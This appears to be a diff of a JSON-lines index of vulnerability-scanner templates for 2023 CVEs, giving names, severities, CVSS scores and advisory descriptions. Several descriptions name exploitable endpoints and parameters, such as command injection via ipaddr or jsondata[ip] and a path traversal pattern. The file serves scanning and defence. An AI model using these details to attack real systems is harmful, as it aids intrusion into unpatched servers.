{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2196,6 +2201,7 @@
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"} {"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"} {"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"} {"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"} {"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"} {"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"} {"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
@ -2217,6 +2223,7 @@
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"} {"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"} {"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
{"ID":"CVE-2023-42344","Info":{"Name":"OpenCMS - XML external entity (XXE)","Severity":"high","Description":"users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42344.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
@ -2230,6 +2237,7 @@
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"} {"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"} {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
@ -2244,6 +2252,7 @@
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
@ -2270,18 +2279,34 @@
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"} {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"} {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
